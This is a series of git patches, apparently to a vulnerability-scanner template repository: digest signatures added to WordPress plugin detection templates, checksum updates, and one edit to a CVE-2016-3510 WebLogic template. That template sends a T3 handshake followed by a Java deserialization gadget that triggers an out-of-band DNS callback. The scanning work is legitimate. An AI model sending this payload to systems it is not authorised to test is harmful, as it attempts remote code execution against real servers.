b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..ce42f54fac 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f5ff4293f07213be285b988fc42d104806675521bd3759e66774b3172cb3a2e0220336be2fdb6d4e50774596f7533150a841f5fab562238579c85dd31ca008fd3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..7744d5fd74 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210094eacee66e33943199bb9c1bace3be9c2edd9fc5a95de77506de93e71b5e01db0220372272b0bb6894ae0e49d53192a2260a2a1a19e1d85aa12e259922a6e66925d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..c2623b2659 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200660ec3aa062936b2c1b508811788d91253353e9cb5fe1aba8ae3f699655f16c022100983336575471b68018d47c010a896c694acf8f403e1483b2c43bf2f81abc32bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..28f5246c18 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039c27a5ca53fd5b2acdbfea05e01808abcf253e109dd3923b736179beaeaf881022100c866555efb4da04ea855741e52151885512832278f73cfb38cd9f382bb87ff83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..830c345d18 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f71cd60b714e7d5cb2b10a71f8baf7021263d6b206a8df353a247df045486df02206999f64324f55b88b6470a9914bf2fc08bb24f5b25a3723b8d6a0a4f16068d19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..de10975c9d 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206296c322f05d4b20611fa335342287be5105961ab67624922a64f729b95e6796022018c55cfff7f79b215726895652eeb089f84c9e108a6253b480426fbc698415f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..46088b2b9a 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220663fff582d7df51eb99daec83fc681a6c3538e9732bf7728a0728c01ba39a266022034baf444c8c06203a8649f19162c1d31cc18cef474b7172477ab8af44ac9f988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..233c86374e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220222050e77b63e1dfb5163a2cab92a30689a97fa9a96164a796c6a983822ee6cd0221009c309bccdba795e1e7c00a4f1de5449cf69bc6cc350553ebbd395cc651745062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..9fa594eaf1 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c23fecf4f453bf12a8a41e568954c8061869e105a41934f692855630a8e835d02204414550028f2a6cdb34c72b21e1b94e1dd53524705fcdd21358534aea1d1556e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..a4e43f3bb1 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0a946df352d25792468ccb6ffd0d3954e6c041e1d7f1ee35de9f6736e77233c02202678812d99d161d651cf2538b53260d0b2b8a5f0aec97dce14e483d44637a0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..f4377b49bf 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a3ded7f3bb2ee85ec16d58336c63df17a309f62f96ff7fb4b1ea7fe24146290022100d432c0aced398e05ffc28595a431163572923a1db0bfb75fbcf8305836f6cc72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..46cf3d2732 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ea181451fbfc676276f8f2e9cd78753b0b6501c9d66c93ba5142e7c8629191002205999b68b6523502578b1ce764d8262e7d957a6f5c5bc82a3f84fc9a8b94ccfcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..8b9a9ae855 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084caac3481937fd095d12f724c70b3986823f65640bd141cb46e42132e75cabd022000efa5cbb1d8ec9c954e3066186b7b8329c07d17b562361a5bc0854b9d3b70d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..89e4e5fd0f 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c253a322c8a9e9bf4302c53c3c1f495f45601ca88d61fcf9a3887c95e4385732022100de66ecc3c05e97b4a92ddaa9c7e9db31bd9084f7eb51d1dd28af3f4ee4a3443e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..547228c812 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5724a9ca75b3598d20ed25529f50219e6b94ae0a79f3ac4af71c84057a4a809022100af318bb9b5d2416ed6080cde6fa816605ac85291d779fbcd982e3d6f5e56174d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..fad5e698c7 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f051ab07e4865c491254a7bd0952e2043349a475d11abd66796cbd7ad51aeccb022100999d4f0ca5667ac690ca8f2d355ae36b58afe86207279a563993e6a51449d049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..11ec8409d6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220232efc822075000829e67bbeaafe97c635decc85a688617ddc3b1b39c5a186af022100da53a350503bd6871d3f489606dce5e449462af8aa29b6ac7c5c10c0ec764fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..d4cf683762 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbecd2ca3ac67601649c03436eb0b014b086df216040efa6c30547bdacd1bc220220129fa29939b9944a39f13ddabb47d90cb6ec67473ba00fbe118680869f332cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..d5994059b1 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220032080307ac68f111523f63082104f86842e7caaec5eb275b77c555fb52abb1002207a01e2e7e62166fa07640dc01e1dfcea08d8136a597acdf558a5a46c715b4543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..609bcdb343 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1e1641d187f75c4a8ed4a7cfc93df0bfbe8841e565c626942a778cdf584736a022100d8a53705b4d95e67e7518134608d06e79faf080115ba497e440633c4dbc3d2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..abce15aeff 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220483da9e245d50c362da31579c67f881938a75845b640288a9b7dc400a2aaf31f02202ed3b6c4d36b3d212afa630acfed612eecac1d257a96137a30abf92e89c870a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..c238ec3240 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e4c9694e62ccc9e91193c6a76f6cd27910651aca26c0c72d92c052572ef937f02207c034e1848bc26226737317bedc7184349f26eca74c230c991cfc406c8230a29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From de032d1dd6b7b4034887479500c20c3a2d2dfb4e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Jul 2024 13:14:49 +0530 Subject: [PATCH 1120/1841] misc update --- network/cves/2016/CVE-2016-3510.yaml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 72472c0351..9cdd02fbcc 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.04407 - epss-percentile: 0.92379 + epss-score: 0.03351 + epss-percentile: 0.91456 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -39,23 +39,15 @@ variables: tcp: - inputs: - - data: "t3 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" read: 1024 - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + host: - "{{Hostname}}" - "{{Host}}:7001" + read-size: 4 matchers: - type: word From f6b5166caa09350ccf2d7d40f1d105b5b46db667 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:45:30 +0000 Subject: [PATCH 1122/1841] Auto Generated Templates Checksum [Thu Jul 11 07:45:30 UTC 2024] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5b3ffd1130..c4980c8234 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7273,228 +7273,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:eb91b36b5b6509efa668623ebd2ae894407af24b +http/technologies/wordpress/plugins/add-to-any.yaml:8ffa5d998f94bbe8542261afa185507ba564b3b7 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:7f76d64453450d56cda368101bfaf6277bef4f7e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:55d0ddb31c997897daf3b3c21d5e188d64c57ff1 +http/technologies/wordpress/plugins/akismet.yaml:f384beb058b0d5639806a0389da7c8f3fe6dde35 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:83b6097fa8ac5f5910a9c0832cf379e8bebb0801 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:f0c45884643adc637c219938f6f44702b3f69455 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:be9d732188a59614f43d74abe292216b14285b5d +http/technologies/wordpress/plugins/amp.yaml:f63acc06003b29d394316675972db194fb13b32a +http/technologies/wordpress/plugins/antispam-bee.yaml:7352f0ed7d412b6728120eb0e9a99fce503c014c +http/technologies/wordpress/plugins/astra-sites.yaml:861e7431ed2603a0c918c9af342493eb1b4db6be http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:fa24a6696b53dd4fd9ad8a801d5a2beea1bbbca8 +http/technologies/wordpress/plugins/backwpup.yaml:1c60c2bbe2a48041cc5c0e7e82fbf8a5b1502d8b +http/technologies/wordpress/plugins/better-search-replace.yaml:6e1b1dec1edf44b566eaa3e22b89822ee33b5867 +http/technologies/wordpress/plugins/better-wp-security.yaml:cf8e85c94f39964ba400f05790f4ae8fbc3992ef +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:04df46b72fffdfed0c986c8408f253eae3a7e4cb +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:036d6068efa37d265c4c4586ac67cab31092fc85 +http/technologies/wordpress/plugins/breeze.yaml:0291aef183d043ef508a76d2c5b6b5e7656d8bcc +http/technologies/wordpress/plugins/broken-link-checker.yaml:140b8dbaebd5abb1b99287f1f454e552bbec4e58 +http/technologies/wordpress/plugins/chaty.yaml:5b0e04d4aef22797857773de881fff55e38245bd +http/technologies/wordpress/plugins/child-theme-configurator.yaml:4e13edf9445bd2945b9c6939b72e981645e330e3 +http/technologies/wordpress/plugins/classic-editor.yaml:409a814ea9c183599db89e4c70e40321fa39a612 +http/technologies/wordpress/plugins/classic-widgets.yaml:f06e5a41e2a8678edf55c7e50c27893b77ec5f4d +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e9c2ef515b6d5d1772031487e275d493bf1617d7 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:f8d3f23c6ce4269bd8b5e8b2b5501d01c264bed3 +http/technologies/wordpress/plugins/coblocks.yaml:c1db3cb2812f0b7f316495dee7f07d8695447801 +http/technologies/wordpress/plugins/code-snippets.yaml:05d0caa3a169bc4e4c0ad56d478cff88cf2caee6 +http/technologies/wordpress/plugins/coming-soon.yaml:514656f9cb7e79a7b5f3981e8049587e43a5107a +http/technologies/wordpress/plugins/complianz-gdpr.yaml:424da6b75af3e4bb58385a1546a89ef333cff08e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:350de257e1afad32dace578f41e3e7baace42de7 +http/technologies/wordpress/plugins/contact-form-7.yaml:ee0914b3c26085526ed50bd29a84ba7c7bc1544c +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b5ebe5ea38a33241c1805765d5a3612a65616e91 +http/technologies/wordpress/plugins/cookie-law-info.yaml:c0b3b61dd19872d7b83f4604b1a0d7df34c6b09f +http/technologies/wordpress/plugins/cookie-notice.yaml:6a3f8c598d22104300d7b5981735d67239587cf7 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:df3d0b1ef2a10aa76e87fe94fce5adeec2f2dc36 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:3a955758eb8360653eb3358342fb65767e1b250f +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:5cbe0f96d2f1d5d0592880110b6288291f2bba3e +http/technologies/wordpress/plugins/custom-css-js.yaml:741f148ab54e365b01b7a663e953c0f3c6e14c6f +http/technologies/wordpress/plugins/custom-fonts.yaml:99803b7c90978b26933f8a4e19045f66c680f1a3 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:9aef654ba818644f34d21d6776505e251168bcad +http/technologies/wordpress/plugins/disable-comments.yaml:2ac9fd4993ffda218750ac6f245a6681ad52c481 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:cdae6ff48e0855f3c4c62393afe48c81090c014b +http/technologies/wordpress/plugins/duplicate-page.yaml:a2eea8b3bd8691978ef065f5e468e9662d5458f9 +http/technologies/wordpress/plugins/duplicate-post.yaml:1aafdc451a9648e15f39855dc3092071f6acccd9 +http/technologies/wordpress/plugins/duplicator.yaml:b6fb5be7d06fce0cb2b4ce10cc9432b1ac147bcf +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9365a26d4680e8205d074a5e87e1bc1b994931e1 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 